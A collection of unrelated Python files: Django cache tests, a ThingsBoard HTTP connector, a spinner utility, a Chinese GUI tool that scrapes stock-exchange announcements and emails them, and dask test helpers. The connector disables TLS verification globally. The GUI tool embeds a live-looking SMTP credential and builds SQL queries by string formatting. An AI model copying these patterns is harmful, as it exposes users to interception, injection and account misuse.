'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
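# Hedged usage sketch (not part of the original module): the helper exercised in
# TestMakeTemplateFragmentKey above is the same one the {% cache %} template tag
# uses to build its keys, so application code can invalidate a cached fragment
# explicitly. The fragment name 'sidebar' and the vary-on value are illustrative.
def _invalidate_sidebar_fragment(username):
    key = make_template_fragment_key('sidebar', [username])
    cache.delete(key)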
|
request_connector.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ssl
from time import sleep
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from random import choice, random
from string import ascii_lowercase
from time import sleep, time
from re import fullmatch
from json import JSONDecodeError
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from requests import Timeout, request
except ImportError:
print("Requests library not found - installing...")
TBUtility.install_package("requests")
from requests import Timeout, request
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.request.json_request_uplink_converter import JsonRequestUplinkConverter
from thingsboard_gateway.connectors.request.json_request_downlink_converter import JsonRequestDownlinkConverter
# pylint: disable=E1101
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':ADH-AES128-SHA256'
class RequestConnector(Connector, Thread):
def __init__(self, gateway, config, connector_type):
super().__init__()
self.statistics = {'MessagesReceived': 0,
'MessagesSent': 0}
self.__rpc_requests = []
self.__config = config
self.__connector_type = connector_type
self.__gateway = gateway
self.__security = HTTPBasicAuth(self.__config["security"]["username"], self.__config["security"]["password"]) if self.__config["security"]["type"] == "basic" else None
self.__host = None
self.__service_headers = {}
if "http://" in self.__config["host"].lower() or "https://" in self.__config["host"].lower():
self.__host = self.__config["host"]
else:
self.__host = "http://" + self.__config["host"]
ssl._create_default_https_context = ssl._create_unverified_context  # globally disable HTTPS certificate verification for this process
self.__ssl_verify = self.__config.get("SSLVerify", False)
self.__scanPeriod = 1
self.setName(self.__config.get("name", "".join(choice(ascii_lowercase) for _ in range(5))))
self.daemon = True
self.__connected = False
self.__stopped = False
self.__requests_in_progress = []
self.__convert_queue = Queue(1000000)
self.__attribute_updates = []
self.__fill_attribute_updates()
self.__fill_rpc_requests()
self.__fill_requests()
def run(self):
while not self.__stopped:
if self.__requests_in_progress:
for request in self.__requests_in_progress:
if time() >= request["next_time"]:
thread = Thread(target=self.__send_request, args=(request, self.__convert_queue, log), daemon=True, name="Request to endpoint \'%s\' Thread" % (request["config"].get("url")))
sleep(random())  # small random jitter before starting the request thread
thread.start()
else:
sleep(.1)
self.__process_data()
def on_attributes_update(self, content):
try:
for attribute_request in self.__attribute_updates:
if fullmatch(attribute_request["deviceNameFilter"], content["device"]) and fullmatch(attribute_request["attributeFilter"], list(content["data"].keys())[0]):
converted_data = attribute_request["converter"].convert(attribute_request, content)
response_queue = Queue(1)
request_dict = {"config": {**attribute_request,
**converted_data},
"request": request}
attribute_update_request_thread = Thread(target=self.__send_request,
args=(request_dict, response_queue, log),
daemon=True,
name="Attribute request to %s" % (converted_data["url"]))
attribute_update_request_thread.start()
attribute_update_request_thread.join()
if not response_queue.empty():
response = response_queue.get_nowait()
log.debug(response)
del response_queue
except Exception as e:
log.exception(e)
def server_side_rpc_handler(self, content):
try:
for rpc_request in self.__rpc_requests:
if fullmatch(rpc_request["deviceNameFilter"], content["device"]) and fullmatch(rpc_request["methodFilter"], content["data"]["method"]):
converted_data = rpc_request["converter"].convert(rpc_request, content)
response_queue = Queue(1)
request_dict = {"config": {**rpc_request,
**converted_data},
"request": request}
request_dict["config"].get("uplink_converter")
rpc_request_thread = Thread(target=self.__send_request,
args=(request_dict, response_queue, log),
daemon=True,
name="RPC request to %s" % (converted_data["url"]))
rpc_request_thread.start()
rpc_request_thread.join()
if not response_queue.empty():
response = response_queue.get_nowait()
log.debug(response)
self.__gateway.send_rpc_reply(device=content["device"], req_id=content["data"]["id"], content=response[2])
self.__gateway.send_rpc_reply(success_sent=True)
del response_queue
except Exception as e:
log.exception(e)
def __fill_requests(self):
log.debug(self.__config["mapping"])
for endpoint in self.__config["mapping"]:
try:
log.debug(endpoint)
converter = None
if endpoint["converter"]["type"] == "custom":
module = TBUtility.check_and_import(self.__connector_type, endpoint["converter"]["extension"])
if module is not None:
log.debug('Custom converter for url %s - found!', endpoint["url"])
converter = module(endpoint)
else:
log.error("\n\nCannot find extension module for %s url.\nPlease check your configuration.\n", endpoint["url"])
else:
converter = JsonRequestUplinkConverter(endpoint)
self.__requests_in_progress.append({"config": endpoint,
"converter": converter,
"next_time": time(),
"request": request})
except Exception as e:
log.exception(e)
def __fill_attribute_updates(self):
for attribute_request in self.__config.get("attributeUpdates", []):
if attribute_request.get("converter") is not None:
converter = TBUtility.check_and_import("request", attribute_request["converter"])(attribute_request)
else:
converter = JsonRequestDownlinkConverter(attribute_request)
attribute_request_dict = {**attribute_request, "converter": converter}
self.__attribute_updates.append(attribute_request_dict)
def __fill_rpc_requests(self):
for rpc_request in self.__config.get("serverSideRpc", []):
if rpc_request.get("converter") is not None:
converter = TBUtility.check_and_import("request", rpc_request["converter"])(rpc_request)
else:
converter = JsonRequestDownlinkConverter(rpc_request)
rpc_request_dict = {**rpc_request, "converter": converter}
self.__rpc_requests.append(rpc_request_dict)
def format_time_to_endpoint(self, datetime_from):
datetime_from = datetime_from.replace(".", '.000Z')
datetime_from = datetime_from.replace(datetime_from[10], "T")
datetime_from = datetime_from[:24]
return datetime_from
def format_url(self, url, request):
datetime_from = datetime.now()
hours_back = 24
self.__scanPeriod = request["config"].get("scanPeriod")
batch = self.__config.get("get_batch_of_data")
if batch:
batch_size = self.__config.get("batch_size")
else:
batch_size = 1
datetime_from = datetime_from - timedelta(hours=hours_back)
datetime_to = datetime_from + timedelta(seconds=self.__scanPeriod * batch_size)
datetime_from = self.format_time_to_endpoint(str(datetime_from))
datetime_to = self.format_time_to_endpoint(str(datetime_to))
final_url = url + "&from=" + datetime_from + "&to=" + datetime_to
#print("batch_size: ", batch_size, "-----------------------------------")
return final_url
def __send_request(self, request, converter_queue, logger):
url = ""
try:
request["next_time"] = time() + request["config"].get("scanPeriod", 10)
request_url_from_config = request["config"]["url"]
request_url_from_config = str('/' + request_url_from_config) if request_url_from_config[0] != '/' else request_url_from_config
logger.debug(request_url_from_config)
url = self.__host + request_url_from_config
url = self.format_url(url, request)
logger.debug(url)
request_timeout = request["config"].get("timeout", 1)
params = {
"method": request["config"].get("httpMethod", "GET"),
"url": url,
"timeout": request_timeout,
"allow_redirects": request["config"].get("allowRedirects", False),
"verify": self.__ssl_verify,
"auth": self.__security,
"data": request["config"].get("data", {})
}
logger.debug(url)
if request["config"].get("httpHeaders") is not None:
params["headers"] = request["config"]["httpHeaders"]
logger.debug("Request to %s will be sent", url)
# Send the request; if the body cannot be parsed as JSON on the first try,
# the except branch below retries a few times with a short pause.
try:
#print("url is ", url)
response = request["request"](**params)
#print("response is ", response)
if response.json() is not None:
pass
except:
for i in range(5):
try:
if response.json() is not None:
break
except:
sleep(2)
response = request["request"](**params)
#print("response is ", response)
#self.statistik[1] += 1
#print(response.json())
if response and response.ok:
if not converter_queue.full():
data_to_storage = [url, request["converter"]]
try:
data_to_storage.append(response.json())
except UnicodeDecodeError:
data_to_storage.append(response.content)  # fall back to raw bytes when the body cannot be decoded
except JSONDecodeError:
data_to_storage.append(response.content)  # fall back to raw bytes when the body is not valid JSON
if len(data_to_storage) == 3:
converter_queue.put(data_to_storage)
self.statistics["MessagesReceived"] = self.statistics["MessagesReceived"] + 1
else:
logger.error("Request to URL: %s finished with code: %i", url, response.status_code)
except Timeout:
logger.error("Timeout error on request %s.", url)
except RequestException as e:
logger.error("Cannot connect to %s. Connection error.", url)
logger.debug(e)
except ConnectionError:
logger.error("Cannot connect to %s. Connection error.", url)
except Exception as e:
logger.exception(e)
def __process_data(self):
try:
if not self.__convert_queue.empty():
url, converter, data = self.__convert_queue.get()
data_to_send = {}
if self.__config.get("get_batch_of_data") is False:
#print("11111111111111111111")
if isinstance(data, list):
for data_item in data:
converted_data = converter.convert(url, data_item)
if data_to_send.get(converted_data["deviceName"]) is None:
data_to_send[converted_data["deviceName"]] = converted_data
else:
if converted_data["telemetry"]:
data_to_send[converted_data["deviceName"]]["telemetry"].append(converted_data["telemetry"][0])
if converted_data["attributes"]:
data_to_send[converted_data["deviceName"]]["attributes"].append(converted_data["attributes"][0])
for device in data_to_send:
self.__gateway.send_to_storage(self.get_name(), data_to_send[device])
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
log.debug(data_to_send)
else:
data_to_send = converter.convert(url, data)
self.__gateway.send_to_storage(self.get_name(), data_to_send)
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
log.debug(data_to_send)
else:
#print("2222222222222222222")
data_to_send = converter.convert(url, data)
self.real_time_sim_of_batch(self.__config, data_to_send)
log.debug(data_to_send)
else:
sleep(.01)
except Exception as e:
log.exception(e)
def real_time_sim_of_batch(self, config, data):
try:
#print("new values###################################")
time_to_sleep = self.get_time(data)
data_to_check = data["telemetry"]
length_of_arr = 0
for sensor in data_to_check:
for j in sensor:
length_of_arr = len(sensor[j])
dict_result = {"deviceName": data["deviceName"], "deviceType": "default", "attributes": [], "telemetry": []}
i = 0
for length_of_arr in range(length_of_arr):
for sensor in data_to_check:
for j in sensor:
dict_result["telemetry"].append({j : sensor[j][i]["value"]})
i += 1
self.__gateway.send_to_storage(self.get_name(), dict_result)
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
dict_result = {"deviceName": data["deviceName"], "deviceType": "default", "attributes": [], "telemetry": []}
sleep(time_to_sleep)
#log.debug(data_to_send)
except Exception as e:
log.exception(e)
def get_time(self, data):
try:
for sensor in data["telemetry"][0]:
endTime = data["telemetry"][0][sensor][1]["time"]
startTime = data["telemetry"][0][sensor][0]["time"]
startTime = startTime[11:19]
startHour = startTime[:2]
startMin = startTime[3:5]
startSec = startTime[6:9]
endTime = endTime[11:19]
endHour = endTime[:2]
endMin = endTime[3:5]
endSec = endTime[6:9]
startTime = 3600*int(startHour) + 60*int(startMin) + int(startSec)
endTime = 3600*int(endHour) + 60*int(endMin) + int(endSec)
return endTime - startTime
except Exception as e:
log.exception(e)
def get_name(self):
return self.name
def is_connected(self):
return self.__connected
def open(self):
self.__stopped = False
self.start()
def close(self):
self.__stopped = True
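# Hedged illustration (not taken from the source): __fill_requests and
# __send_request above read "url", "httpMethod", "scanPeriod", "timeout",
# "allowRedirects", "httpHeaders", "data" and a "converter" section from each
# entry in config["mapping"], while __init__ expects "host", "security",
# "SSLVerify", "attributeUpdates" and "serverSideRpc". A minimal configuration
# for this connector might therefore look roughly like the dict below; any key
# or value not referenced in the code above is an assumption.
_EXAMPLE_CONFIG = {
    "host": "127.0.0.1:5000",
    "SSLVerify": False,
    "security": {"type": "anonymous"},
    "mapping": [
        {
            "url": "api/values",
            "httpMethod": "GET",
            "scanPeriod": 10,
            "timeout": 1,
            "allowRedirects": False,
            "httpHeaders": {"Content-Type": "application/json"},
            "converter": {"type": "json"},
        }
    ],
    "attributeUpdates": [],
    "serverSideRpc": [],
}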
|
spinner.py
|
# From: https://stackoverflow.com/a/39504463
# License: Creative Commons Attribution-Share Alike
# Copyright: Victor Moyseenko
import sys
import threading
import time
class Spinner:
running = False
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
try:
if sys.stdout.isatty():
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
except Exception:
# we don't care what happens here
pass
self.running = False
def start(self):
self.running = True
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self, exception=None):
self.busy = False
time.sleep(self.delay)
while self.running:
pass
sys.stdout.write(" ")
sys.stdout.flush()
sys.stdout.write("\b")
sys.stdout.flush()
if exception is not None:
return False
def __enter__(self):
self.start()
return self
def __exit__(self, exception, value, tb):
return self.stop(exception)
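# Minimal usage sketch: the class is designed to be driven either explicitly via
# start()/stop() or as a context manager around a slow operation.
if __name__ == "__main__":
    with Spinner(delay=0.1):
        time.sleep(2)  # stand-in for a long-running task while the cursor spins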
|
gui.py
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
# @Author : lusheng
import os
from tkinter import *
from tkinter import messagebox
import sqlite3
from datetime import datetime, date, timedelta
import time
import requests
import re
import json
from email.utils import parseaddr, formataddr
import smtplib
from email.mime.text import MIMEText
from email.header import Header
from email.mime.multipart import MIMEMultipart
import logging
import pywintypes
import win32api
import win32gui
import win32con
from threading import Thread
def init_db():
# Connect to the database
conn = sqlite3.connect("announcement.db")
c = conn.cursor()
# Create the table
c.execute('''DROP TABLE IF EXISTS announcement ''')  # drop the old table if it exists (this is temporary data)
c.execute('''
CREATE TABLE announcement (
id INTEGER PRIMARY KEY AUTOINCREMENT,
companyCd INTEGER ,
companyName text,
title text,
publishDate text,
filePath text)
''')
conn.commit()
conn.close()
label70 = Label(root, text='数据库初始化成功', font=('楷体', 10), fg='black')
label70.grid(row=7, column=0, columnspan=2, sticky=W)
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((
Header(name, 'utf-8').encode(),
addr))
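# Usage sketch: _format_addr(u'Announcement Push <someone@example.com>') returns a
# From/To header value with the display name RFC 2047-encoded, so non-ASCII names
# survive SMTP transport; the example name and address are illustrative.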
# Send notification email
def sendMails(receivers, companyCd, companyName, disclosureTitle, publishDate, destFilePath):
mail_host = "smtp.qq.com" # 设置服务器
mail_user = "228383562@qq.com" # 用户名
mail_pass = "waajnvtmdhiucbef" # 口令
sender = '228383562@qq.com'
#
# mail_user = "610559273@qq.com" # 用户名
# mail_pass = "xrljvzsvdzbbbfbb" # 口令
# sender = '610559273@qq.com'
receiversName = '收件邮箱'
receivers = receivers
mail_msg = """
公司代码:%s <br>
公司名称:%s <br>
公告日期:%s <br>
公告标题:%s <br>
公告链接:%s <br>
<p>这是全国中小企业股份转让系统查询推送</p>
""" % (companyCd, companyName, publishDate, disclosureTitle, destFilePath)
main_msg = MIMEMultipart()
main_msg.attach(MIMEText(mail_msg, 'html', 'utf-8'))
main_msg['From'] = _format_addr(u'公告推送<%s>' % mail_user)
main_msg['To'] = _format_addr(u'公告收件<%s>' % receivers)
main_msg['Subject'] = Header(disclosureTitle, 'utf-8').encode()
try:
smtpObj = smtplib.SMTP('smtp.qq.com', 587)
# smtp = smtplib.SMTP_SSL(mailserver)
# smtpObj = smtplib.SMTP('smtp.163.com', 25)
smtpObj.ehlo()
smtpObj.starttls()
smtpObj.login(mail_user, mail_pass)
smtpObj.sendmail(sender, receivers, main_msg.as_string())
smtpObj.quit()
print("邮件发送成功")
logging.info("邮件发送成功")
return 1
except smtplib.SMTPException as e:
print("无法发送邮件")
logging.error("Error: 无法发送邮件, %s" % e)
return 0
def run():
companyCd = entry.get().strip()
companyName = entry11.get().strip()
startTime = entry21.get().strip()
endTime = entry31.get().strip()
receiveMail = entry41.get().strip()
if companyCd == '' and companyName == '':
messagebox.showinfo('提示', '公司名称和公司代码不能都为空,请检查')
return
if companyCd != '' and companyName != '':
messagebox.showinfo('提示', '公司名称和公司代码不能同时填写,请检查')
return
if len(startTime) != 10:
messagebox.showinfo('提示', '开始日期格式不对,请检查')
return
# if len(endTime) != 10:
# messagebox.showinfo('提示', '结束日期格式不对,请检查')
# return
h = win32gui.FindWindow('TkTopLevel','中小企业股份转让系统公告查询工具')
win32gui.ShowWindow(h,win32con.SW_HIDE)
hinst = win32api.GetModuleHandle(None)
iconPathName = "icon.ico"
if os.path.isfile(iconPathName):
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
hicon = win32gui.LoadImage(hinst, iconPathName, win32con.IMAGE_ICON, 0, 0, icon_flags)
else:
print("icon file not found; falling back to the default application icon")
hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_TIP
nid = (h, 0, flags, win32con.WM_USER + 20, hicon, "公告推送")
try:
win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
except:
print("Failed to add the taskbar icon - is explorer running?")
# flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_TIP
# nid = (h, 0, win32gui.NIF_INFO, win32con.WM_USER + 20, 'icon.ico', "tooltip")
# win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
def get():
while 1:
companyCd = entry.get().strip()
if companyCd != '':
companyCd_list = companyCd.split(';')
for ccd in companyCd_list:
db = sqlite3.connect("announcement.db")
c = db.cursor()
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": 0,
"startTime": startTime,
"endTime": endTime,
"companyCd": ccd,
"isNewThree": 1,
"keyword": None,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath", "publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
news_list = []
response1 = requests.post(URL, data)
# print(response1.text)
response2 = re.search('(?<=\(\[)(.*?)(?=]\))', response1.text).group()
# print(response2)
j = json.loads(response2)['listInfo']
if j['content'] == []:
messagebox.showinfo('提示', '没有查询到信息,请检查公司代码或名称是否正确')
return
else:
totalElements = j['totalElements']
totalPages = j['totalPages']
logging.info("通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages))
# label70 = Label(root, text="通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages),
# font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
for n in range(totalPages):
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": n,
"startTime": startTime,
"endTime": endTime,
"companyCd": ccd,
"isNewThree": 1,
"keyword": None,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath",
"publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
logging.info("正在处理第%d页" % (n + 1))
# label80 = Label(root, text="正在处理第%d页" % (n + 1), font=('楷体', 12), fg='black')
# label80.grid(row=8, column=0, columnspan=2, sticky=W)
response3 = requests.post(URL, data)
response4 = re.search('(?<=\(\[)(.*?)(?=]\))', response3.text).group()
j = json.loads(response4)['listInfo']
list = j['content']
# For each announcement on this page, check the database and send an email
for li in list:
# print(li)
companyCd2 = li['companyCd']
companyName2 = li['companyName']
destFilePath = "http://www.neeq.com.cn" + li['destFilePath']
disclosureTitle = li['disclosureTitle']
publishDate = li['publishDate']
xxfcbj = li['xxfcbj']
xxzrlx = li['xxzrlx']
result = c.execute("SELECT * FROM announcement where filePath = '%s'" % destFilePath)
if result.fetchone():
print(disclosureTitle, " 该公告数据库中已存在\n")
logging.info(disclosureTitle + " 该公告数据库中已存在")
# label90 = Label(root, text=disclosureTitle + " 该公告数据库中已存在", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
else:
# 发送邮件
mailResult = sendMails(receiveMail, companyCd2, companyName2, disclosureTitle, publishDate,
destFilePath)
# print(mailResult)
if mailResult == 1:
data = "NULL,\'%s\',\'%s\',\'%s\',\'%s\',\'%s\'" % (
companyCd2, companyName2, disclosureTitle, publishDate, destFilePath)
# print(data, "\n")
c.execute('INSERT INTO announcement VALUES (%s)' % data)
db.commit()
print(disclosureTitle, " 该公告已存入数据库\n")
logging.info(disclosureTitle + " 该公告已存入数据库")
# label90 = Label(root, text=disclosureTitle + " 该公告已存入数据库", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
time.sleep(5)
time.sleep(20)  # pause after fetching a page to avoid hitting the server too quickly
db.close()
if companyName != '':
companyName_list = companyName.split(';')
for keyword in companyName_list:
db = sqlite3.connect("announcement.db")
c = db.cursor()
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": 0,
"startTime": startTime,
"endTime": endTime,
"companyCd": None,
"isNewThree": 1,
"keyword": keyword,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath", "publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
news_list = []
response1 = requests.post(URL, data)
# print(response1.text)
response2 = re.search('(?<=\(\[)(.*?)(?=]\))', response1.text).group()
# print(response2)
j = json.loads(response2)['listInfo']
if j['content'] == []:
messagebox.showinfo('提示', '没有查询到信息,请检查公司代码或名称是否正确')
return
else:
totalElements = j['totalElements']
totalPages = j['totalPages']
logging.info("通过关键字%s查询到%d条公告,共%d页" % (keyword, totalElements, totalPages))
# label70 = Label(root, text="通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages),
# font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
for n in range(totalPages):
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": n,
"startTime": startTime,
"endTime": endTime,
"companyCd": companyCd,
"isNewThree": 1,
"keyword": keyword,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath",
"publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
logging.info("正在处理第%d页" % (n + 1))
# label80 = Label(root, text="正在处理第%d页" % (n + 1), font=('楷体', 12), fg='black')
# label80.grid(row=8, column=0, columnspan=2, sticky=W)
response3 = requests.post(URL, data)
response4 = re.search('(?<=\(\[)(.*?)(?=]\))', response3.text).group()
j = json.loads(response4)['listInfo']
list = j['content']
# For each announcement on this page, check the database and send an email
for li in list:
# print(li)
companyCd2 = li['companyCd']
companyName2 = li['companyName']
destFilePath = "http://www.neeq.com.cn" + li['destFilePath']
disclosureTitle = li['disclosureTitle']
publishDate = li['publishDate']
xxfcbj = li['xxfcbj']
xxzrlx = li['xxzrlx']
result = c.execute("SELECT * FROM announcement where filePath = '%s'" % destFilePath)
if result.fetchone():
print(disclosureTitle, " 该公告数据库中已存在\n")
logging.info(disclosureTitle + " 该公告数据库中已存在")
# label90 = Label(root, text=disclosureTitle + " 该公告数据库中已存在", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
else:
# 发送邮件
mailResult = sendMails(receiveMail, companyCd2, companyName2, disclosureTitle, publishDate,
destFilePath)
# print(mailResult)
if mailResult == 1:
data = "NULL,\'%s\',\'%s\',\'%s\',\'%s\',\'%s\'" % (
companyCd2, companyName2, disclosureTitle, publishDate, destFilePath)
# print(data, "\n")
c.execute('INSERT INTO announcement VALUES (%s)' % data)
db.commit()
print(disclosureTitle, " 该公告已存入数据库\n")
logging.info(disclosureTitle + " 该公告已存入数据库")
# label90 = Label(root, text=disclosureTitle + " 该公告已存入数据库", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
time.sleep(1)
time.sleep(3)  # rest 3 seconds after fetching a page to avoid hitting the server too quickly
db.close()
logging.info("本次查询结束 .,10分钟后开始下次查询")
label70 = Label(root, text='本次查询结束 .,10分钟后开始下次查询', font=('楷体', 10), fg='black')
label70.grid(row=7, column=0, columnspan=2, sticky=W)
time.sleep(600)
t = Thread(target=get)
t.start()
logging.basicConfig(filename='./log.log', format='[%(asctime)s-%(filename)s-%(levelname)s:%(message)s]',
level=logging.DEBUG, filemode='a', datefmt='%Y-%m-%d %I:%M:%S %p')
URL = 'http://www.neeq.com.cn/disclosureInfoController/infoResult_zh.do?callback=jQuery331_1596699678177'
root = Tk()
root.title('中小企业股份转让系统公告查询工具')
root.geometry('430x190')
root.geometry('+400+200')
# Prompt label before the text input
label = Label(root, text='公司代码:', width=10, font=('楷体', 12), fg='black')
label.grid(row=0, column=0, )
# Text input - company code
entry = Entry(root, font=('微软雅黑', 12), width=35)
entry.grid(row=0, column=1, sticky=W)
# Prompt label before the text input
label10 = Label(root, text='公司名称:', width=10, font=('楷体', 12), fg='black')
label10.grid(row=1, column=0)
# Text input - company name
entry11 = Entry(root, font=('微软雅黑', 12), width=35)
entry11.grid(row=1, column=1, sticky=W)
# Start date
label20 = Label(root, text='起始日期:', width=10, font=('楷体', 12), fg='black')
label20.grid(row=2, column=0)
# Text input - start date
sd = StringVar()
sd.set((datetime.today() + timedelta(days=-30)).strftime("%Y-%m-%d"))
entry21 = Entry(root, textvariable=sd, font=('微软雅黑', 12), width=35)
entry21.grid(row=2, column=1, sticky=W)
# End date
label30 = Label(root, text='结束日期:', width=10, font=('楷体', 12), fg='black')
label30.grid(row=3, column=0)
# Text input - end date
# datetime.today()
# ed = StringVar()
# ed.set(datetime.today().strftime("%Y-%m-%d"))
# entry31 = Entry(root, textvariable=ed, font=('微软雅黑', 12), width=29)
entry31 = Entry(root, font=('微软雅黑', 12), width=35)
entry31.grid(row=3, column=1, sticky=W)
# Recipient email
label40 = Label(root, text='收件邮箱:', font=('楷体', 12), fg='black')
label40.grid(row=4, column=0)
# Text input - recipient email
receiveMail = StringVar()
# receiveMail.set('610559273@qq.com')
receiveMail.set('lusheng1234@126.com')
entry41 = Entry(root, textvariable=receiveMail, font=('微软雅黑', 12), width=35)
entry41.grid(row=4, column=1, sticky=W)
# Initialize the database
button50 = Button(root, text='初始化', width=8, font=('幼圆', 12), fg='purple', command=init_db)
button50.grid(row=5, column=0)
# Start button
button51 = Button(root, text='开始', width=20, font=('幼圆', 12), fg='purple', command=run)
button51.grid(row=5, column=1)
label60 = Label(root, text=' ', font=('楷体', 6), fg='black')
label60.grid(row=6, column=0, columnspan=2, sticky=W)
# label70 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label70.grid(row=6, column=0, columnspan=2, sticky=W)
# label80 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label80.grid(row=6, column=0, columnspan=2, sticky=W)
# label90 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label90.grid(row=6, column=0, columnspan=2, sticky=W)
# Execution status
# label70 = Label(root, text='执行情况:' + 'dasdadas888888888888888888888888', font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
root.mainloop()
|
utils_test.py
|
import asyncio
import collections
from contextlib import contextmanager
import copy
from datetime import timedelta
import functools
from glob import glob
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import textwrap
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import dask
from toolz import merge, memoize, assoc
from tornado import gen, queues
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from . import system
from .client import default_client, _global_clients, Client
from .compatibility import WINDOWS
from .comm import Comm
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
ignoring,
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
_offload_executor,
)
from .worker import Worker
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
